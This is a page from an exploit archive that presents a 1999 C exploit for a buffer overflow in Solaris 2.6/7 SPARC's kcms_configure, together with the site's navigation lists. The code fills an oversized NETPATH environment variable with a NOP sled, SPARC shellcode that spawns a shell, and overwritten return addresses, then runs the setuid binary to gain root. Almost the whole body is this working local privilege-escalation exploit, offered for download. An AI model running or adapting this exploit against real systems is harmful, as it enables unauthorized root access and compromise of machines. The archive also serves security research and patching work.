ex_kcms_configuresp.c

ex_kcms_configuresp.c: Posted Nov 25, 1999; Authored by Unyun, shadowpenguin | Site shadowpenguin.backsection.net; The vulnerability in kcms_configure also exists in Solaris 2.6 and 2.7 sparc edition. Exploit included.; tags | exploit; systems | unix, solaris; SHA-256 | ddad8f87f48eb849bc4bf6f56910e4be16715ce9dec57022ab5c00f69f2c1712; Download | Favorite | View

ex_kcms_configuresp.c

/*=============================================================================
   kcms_configure Exploit for Solaris2.6/7 Sparc Edition
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/

#define ENV         "NETPATH="
#define MAXBUF      3000
#define RETADR      2116
#define RETOFS      0x1300
#define EXPADR      1200
#define FAKEADR1    2092
#define FAKEADR2    2112
#define NOP         0xa61cc013

char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}

main()
{
    char            buf[MAXBUF];
    unsigned int    i,ip,sp;

    putenv("LANG=");
    sp=get_sp();
    printf("ESP =0x%x\n",sp);

    for (i=0;i<MAXBUF-4;i+=4){
        buf[i+3]=NOP&0xff;
        buf[i+2]=(NOP>>8)&0xff;
        buf[i+1]=(NOP>>16)&0xff;
        buf[i  ]=(NOP>>24)&0xff;
    }

    ip=sp;
    printf("FAKE=0x%x\n",sp);
    buf[FAKEADR1+3]=ip&0xff;
    buf[FAKEADR1+2]=(ip>>8)&0xff;
    buf[FAKEADR1+1]=(ip>>16)&0xff;
    buf[FAKEADR1  ]=(ip>>24)&0xff;
    buf[FAKEADR2+3]=ip&0xff;
    buf[FAKEADR2+2]=(ip>>8)&0xff;
    buf[FAKEADR2+1]=(ip>>16)&0xff;
    buf[FAKEADR2  ]=(ip>>24)&0xff;

    ip=sp-RETOFS;
    printf("EIP =0x%x\n",sp);
    buf[RETADR+3]=ip&0xff;
    buf[RETADR+2]=(ip>>8)&0xff;
    buf[RETADR+1]=(ip>>16)&0xff;
    buf[RETADR]=(ip>>24)&0xff;

    strncpy(buf+EXPADR,exploit_code,strlen(exploit_code));

    strncpy(buf,ENV,strlen(ENV));
    buf[MAXBUF-1]=0;
    putenv(buf);

    execl("/usr/openwin/bin/kcms_configure","kcms_configure","1",0);
}

Top Authors In Last 30 Days

Red Hat 308 files
Ubuntu 67 files
Debian 24 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,133)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,177)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,160)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,495)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,025)
UNIX (9,482)
UnixWare (188)
Windows (6,786)
Other

ex_kcms_configuresp.c

ex_kcms_configuresp.c

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ex_kcms_configuresp.c

Share This

ex_kcms_configuresp.c

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems